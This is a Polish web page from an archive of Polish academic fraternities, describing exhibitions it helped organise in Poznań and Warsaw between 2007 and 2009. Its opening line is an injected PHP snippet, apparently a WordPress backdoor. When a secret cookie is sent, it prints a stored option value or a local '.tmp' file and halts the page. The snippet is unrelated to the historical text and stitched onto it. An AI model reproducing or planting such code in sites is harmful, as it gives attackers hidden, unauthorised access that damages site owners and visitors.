if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Wystawy

Zaproszenie na wystawę Dwudziestolecie. Oblicza nowoczesności, Zamek Królewski w Warszawie 11 X 2008 r. - 1 III 2009 r.

W 2007 r. Archiwum Korporacyjne włączyło się w organizację wystaw poświęconych w całości bądź w części historii i tradycjom polskich korporacji akademickich. W ramach tej działalności wymienić należy w szczególności następujące ekspozycje:

  • „Organizacje Studenckie Dawnego Poznania”, Akademia Ekonomiczna, Poznań 8-31 I 2007 r.,
  • „Tradycja zobowiązuje - ruch korporacyjny w Poznaniu dawniej i dziś”, Uniwersytet im. A. Mickiewicza, Politechnika Poznańska, Poznań 4 XI - 15 XII 2008 r. (cykl trzech wystaw),
  • „Dwudziestolecie. Oblicza nowoczesności”, Zamek Królewski, Warszawa 11 XI 2008 - 1 III 2009 r.,
  • “Życie studenckie w korporacjach akademickich wczoraj i dziś”, Wydział Nauk Politycznych i Dziennikarstwa Uniwersytetu im. A. Mickiewicza, Poznań 25 III - 9 IV 2009 r. oraz Poznańskie Towarzystwo Przyjaciół Nauk, Poznań 24 IV - 30 V 2009 r.,
  • “Uniwersytet na zamku”, dawny zamek cesarski, Poznań 6-31 V 2009 r.

Pierwsza z wymienionych wystaw zatytułowana „Organizacje Studenckie Dawnego Poznania” zorganizowana została z inicjatywy Adama Wize z K! Lechia przez Poznańskie Koło Międzykorporacyjne. Odbyła się w dniach od 8 do 31 stycznia 2007 r. w budynku głównym Akademii Ekonomicznej (Al. Niepodległości 10, Poznań). Celem wystawy było z jednej strony upamiętnienie działających w dwudziestoleciu międzywojennym poznańskich korporacji akademickich, a  z drugiej promocja obecnie działających korporacji zrzeszonych w Poznańskim Kole Międzykorporacyjnym. W ramach wystawy zaprezentowano reprodukcje przedwojennych insygniów korporacyjnych oraz około 180 fotografii przedstawiających historię 26 poznańskich korporacji akademickich działających w latach 1920-1939 na Uniwersytecie Poznańskim oraz Wyższej Szkole Handlowej. Wszystkie eksponaty pochodziły ze zbiorów Archiwum Korporacyjnego.

Wystawa „Organizacje Studenckie Dawnego Poznania” została także zaprezentowana dnia 24 marca 2007 r. z okazji oficjalnych uroczystości reaktywacyjnych Poznańskiego Koła Międzykorporacyjnego.

Druga z wymienionych wystaw zorganizowana została z inicjatywy Pawła Ratajczaka w ramach projektu „Tradycja zobowiązuje - ruch korporacyjny w Poznaniu dawniej i dziś” przez K! Masovia. Jej otwarcie nastąpiło dnia 4 XI 2008 r. w budynku Wydziału Nauk Geograficznych i Geologicznych Uniwersytetu im. A. Mickiewicza (ul. Dzięgielowa 27, Poznań). Następnie ekspozycja została przeniesiona do Centrum Wykładowo-Konferencyjnego Politechniki Poznańskiej (ul. Piotrowo 2, Poznań), a stamtąd na Wydział Elektryczny i Budowy Maszyn Politechniki (ul. Piotrowo 3A, Poznań). Celem projektu i samych ekspozycji była promocja obecnie działających korporacji akademickich. W ramach wystawy zaprezentowano około 60 fotografii z Archiwum Korporacyjnego

Insygnia korporacyjne.Część “korporacyjna” wystawy na Zamku Królewskim, Warszawa 11 XI 2008 r. - 1 III 2009 r.

Trzecia ze wspomnianych ekspozycji znalazła się w ramach organizowanej przez Muzeum Historii Polski pod Honorowym Patronatem Prezydenta Rzeczypospolitej Polskiej prof. Lecha Kaczyńskiego wystawy “Dwudziestolecie. Oblicza nowoczesności“, która odbyła się w dniach 11 XI 2008 - 1 III 2009 z okazji 90. rocznicy odzyskania przez Polskę niepodległości na Zamku Królewskim w Warszawie. W ramach tej ekspozycji zaprezentowane zostało około 30 pamiątek korporacyjnych pochodzących z Archiwum Korporacyjnego, w tym dekle, szarfy, bandy, dewizki, dokumenty oraz fotografie po kilkunastu korporacjach z Wilna (Conradia, Piłsudia, Leonidania), Warszawy (Arkonia, WelecjaSparta, Filomatia Varsoviensis), Lwowa (Slavia), Poznania (Magna-Polonia, Surma, Baltia, Silesia, Roma, Aesculapia), Krakowa (Sian, Chortycia, Emunah) oraz Lublina (Hetmania).

Wystawa Życie studenckie w korporacjach akademickich wczoraj i dziś, od lewej rektor UAM prof. Bronisław Marciniak, prorektor UAM prof. Zbigniew Pilarczyk, wicemarszałek Województwa Wielkopolskiego Krystyna Poślednia, organizator wystawy Tomasz Cieślak, rektor UM prof. Jacek Wysocki, Poznań 6 V 2009 r.

Czwarta wystawa “Życie studenckie w korporacjach akademickich wczoraj i dziś” została zorganizowana przez Tomasza Cieślaka z K! Masovia. Była ona prezentowana w okresie od 25 III 2009 r. do 9 IV 2009 r. w holu głównym siedziby Wydziału Nauk Politycznych i Dziennikarstwa Uniwersytetu im. Adama Mickiewicza w Poznaniu (ul. Umultowska 89a). Patronat honorowy nad wystawą objął Prorektor UAM prof. Zbigniew Pilarczyk. Następnie ekspozycję przeniesiono do siedziby Poznańskiego Towarzystwa Przyjaciół Nauk (ul. Mielżyńskiego 27), gdzie była udostępniona w dniach od 24 IV 2009 r. do 30 V 2009 r. Na wystawę składało się ponad 20 tablic, na których prezentowano przedwojenne i współczesne fotografie o tematyce korporacyjnej. Patronat merytoryczny nad ekspozycją sprawowało Archiwum Korporacyjne.

Więcej informacji o powyższych wystawach można znaleźć w dziale Aktualności.

Trwają prace nad projektem zorganizowania dużej przekrojowej wystawy traktującej o historii i współczesności polskiego ruchu korporacyjnego, która sukcesywnie ma być prezentowana we wszystkich większych ośrodkach akademickich w Polsce.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 29 XI 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }